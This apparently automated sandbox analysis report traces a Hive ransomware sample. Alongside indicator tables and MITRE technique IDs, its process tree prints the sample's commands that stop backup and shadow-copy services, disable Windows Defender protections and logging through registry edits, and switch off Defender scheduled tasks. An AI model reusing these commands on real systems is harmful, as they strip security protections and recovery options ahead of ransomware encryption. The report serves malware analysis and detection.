Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3436	vssadmin.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133866130908174798"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	tor-browser-windows-x86_64-portable-14.0.7.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
7060	notepad.exe
3204	NOTEPAD.EXE

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3628	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
2208	7zFM.exe
2208	taskmgr.exe
3956	tor-browser-windows-x86_64-portable-14.0.7.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2208	7zFM.exe
Token: 35	2208	7zFM.exe
Token: SeSecurityPrivilege	2208	7zFM.exe
Token: SeSecurityPrivilege	5140	wevtutil.exe
Token: SeBackupPrivilege	5140	wevtutil.exe
Token: SeSecurityPrivilege	5860	wevtutil.exe
Token: SeBackupPrivilege	5860	wevtutil.exe
Token: SeSecurityPrivilege	2024	wevtutil.exe
Token: SeBackupPrivilege	2024	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	2192	wmic.exe
Token: SeSecurityPrivilege	2192	wmic.exe
Token: SeTakeOwnershipPrivilege	2192	wmic.exe
Token: SeLoadDriverPrivilege	2192	wmic.exe
Token: SeSystemProfilePrivilege	2192	wmic.exe
Token: SeSystemtimePrivilege	2192	wmic.exe
Token: SeProfSingleProcessPrivilege	2192	wmic.exe
Token: SeIncBasePriorityPrivilege	2192	wmic.exe
Token: SeCreatePagefilePrivilege	2192	wmic.exe
Token: SeBackupPrivilege	2192	wmic.exe
Token: SeRestorePrivilege	2192	wmic.exe
Token: SeShutdownPrivilege	2192	wmic.exe
Token: SeDebugPrivilege	2192	wmic.exe
Token: SeSystemEnvironmentPrivilege	2192	wmic.exe
Token: SeRemoteShutdownPrivilege	2192	wmic.exe
Token: SeUndockPrivilege	2192	wmic.exe
Token: SeManageVolumePrivilege	2192	wmic.exe
Token: 33	2192	wmic.exe
Token: 34	2192	wmic.exe
Token: 35	2192	wmic.exe
Token: 36	2192	wmic.exe
Token: SeIncreaseQuotaPrivilege	2200	wmic.exe
Token: SeSecurityPrivilege	2200	wmic.exe
Token: SeTakeOwnershipPrivilege	2200	wmic.exe
Token: SeLoadDriverPrivilege	2200	wmic.exe
Token: SeSystemProfilePrivilege	2200	wmic.exe
Token: SeSystemtimePrivilege	2200	wmic.exe
Token: SeProfSingleProcessPrivilege	2200	wmic.exe
Token: SeIncBasePriorityPrivilege	2200	wmic.exe
Token: SeCreatePagefilePrivilege	2200	wmic.exe
Token: SeBackupPrivilege	2200	wmic.exe
Token: SeRestorePrivilege	2200	wmic.exe
Token: SeShutdownPrivilege	2200	wmic.exe
Token: SeDebugPrivilege	2200	wmic.exe
Token: SeSystemEnvironmentPrivilege	2200	wmic.exe
Token: SeRemoteShutdownPrivilege	2200	wmic.exe
Token: SeUndockPrivilege	2200	wmic.exe
Token: SeManageVolumePrivilege	2200	wmic.exe
Token: 33	2200	wmic.exe
Token: 34	2200	wmic.exe
Token: 35	2200	wmic.exe
Token: 36	2200	wmic.exe
Token: SeIncreaseQuotaPrivilege	2200	wmic.exe
Token: SeSecurityPrivilege	2200	wmic.exe
Token: SeTakeOwnershipPrivilege	2200	wmic.exe
Token: SeLoadDriverPrivilege	2200	wmic.exe
Token: SeSystemProfilePrivilege	2200	wmic.exe
Token: SeSystemtimePrivilege	2200	wmic.exe
Token: SeProfSingleProcessPrivilege	2200	wmic.exe
Token: SeIncBasePriorityPrivilege	2200	wmic.exe
Token: SeCreatePagefilePrivilege	2200	wmic.exe
Token: SeBackupPrivilege	2200	wmic.exe
Token: SeRestorePrivilege	2200	wmic.exe
Token: SeShutdownPrivilege	2200	wmic.exe
Token: SeDebugPrivilege	2200	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2208	7zFM.exe
2208	7zFM.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe

Suspicious use of SetWindowsHookEx 19 IoCs

pid	Process
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4704 wrote to memory of 3796	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	98
PID 4704 wrote to memory of 3796	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	98
PID 3796 wrote to memory of 4816	3796	net.exe	100
PID 3796 wrote to memory of 4816	3796	net.exe	100
PID 4704 wrote to memory of 3900	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	101
PID 4704 wrote to memory of 3900	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	101
PID 3900 wrote to memory of 2260	3900	net.exe	103
PID 3900 wrote to memory of 2260	3900	net.exe	103
PID 4704 wrote to memory of 5564	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	104
PID 4704 wrote to memory of 5564	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	104
PID 5564 wrote to memory of 3580	5564	net.exe	106
PID 5564 wrote to memory of 3580	5564	net.exe	106
PID 4704 wrote to memory of 2040	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	107
PID 4704 wrote to memory of 2040	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	107
PID 2040 wrote to memory of 3960	2040	net.exe	109
PID 2040 wrote to memory of 3960	2040	net.exe	109
PID 4704 wrote to memory of 1356	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	110
PID 4704 wrote to memory of 1356	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	110
PID 1356 wrote to memory of 5140	1356	net.exe	112
PID 1356 wrote to memory of 5140	1356	net.exe	112
PID 4704 wrote to memory of 1968	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	113
PID 4704 wrote to memory of 1968	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	113
PID 1968 wrote to memory of 5860	1968	net.exe	115
PID 1968 wrote to memory of 5860	1968	net.exe	115
PID 4704 wrote to memory of 4208	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	116
PID 4704 wrote to memory of 4208	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	116
PID 4208 wrote to memory of 3376	4208	net.exe	118
PID 4208 wrote to memory of 3376	4208	net.exe	118
PID 4704 wrote to memory of 2928	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	119
PID 4704 wrote to memory of 2928	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	119
PID 2928 wrote to memory of 5356	2928	net.exe	121
PID 2928 wrote to memory of 5356	2928	net.exe	121
PID 4704 wrote to memory of 2984	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	122
PID 4704 wrote to memory of 2984	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	122
PID 4704 wrote to memory of 2392	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	124
PID 4704 wrote to memory of 2392	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	124
PID 4704 wrote to memory of 4128	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	126
PID 4704 wrote to memory of 4128	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	126
PID 4704 wrote to memory of 1436	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	128
PID 4704 wrote to memory of 1436	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	128
PID 4704 wrote to memory of 3512	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	130
PID 4704 wrote to memory of 3512	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	130
PID 4704 wrote to memory of 1628	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	132
PID 4704 wrote to memory of 1628	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	132
PID 4704 wrote to memory of 1252	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	134
PID 4704 wrote to memory of 1252	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	134
PID 4704 wrote to memory of 4016	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	136
PID 4704 wrote to memory of 4016	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	136
PID 4704 wrote to memory of 5756	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	138
PID 4704 wrote to memory of 5756	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	138
PID 4704 wrote to memory of 2996	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	140
PID 4704 wrote to memory of 2996	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	140
PID 4704 wrote to memory of 2140	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	142
PID 4704 wrote to memory of 2140	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	142
PID 4704 wrote to memory of 4756	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	144
PID 4704 wrote to memory of 4756	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	144
PID 4704 wrote to memory of 6016	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	146
PID 4704 wrote to memory of 6016	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	146
PID 4704 wrote to memory of 2448	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	148
PID 4704 wrote to memory of 2448	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	148
PID 4704 wrote to memory of 6060	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	150
PID 4704 wrote to memory of 6060	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	150
PID 4704 wrote to memory of 5884	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	152
PID 4704 wrote to memory of 5884	4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe	152

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:3160

C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
"C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4704
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:4816
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:2260
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:3580
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:3960
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:5140
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:5860
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:3376
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UnistoreSvc_287d7" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_287d7" /y
    3⤵
    PID:5356
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:2984
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:2392
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:4128
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  - Launches sc.exe
  PID:1436
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:3512
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:1628
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:1252
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UnistoreSvc_287d7" start= disabled
  2⤵
  - Launches sc.exe
  PID:4016
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:5756
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:2996
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender DisableAntiSpyware settings
  PID:2140
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:4756
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:6016
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2448
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:6060
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:5884
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:6080
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:6056
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:5248
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:4236
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:3996
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:6044
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2376
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2588
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:3768
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:5820
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1668
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:2440
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:604
- C:\Windows\SYSTEM32\reg.exe
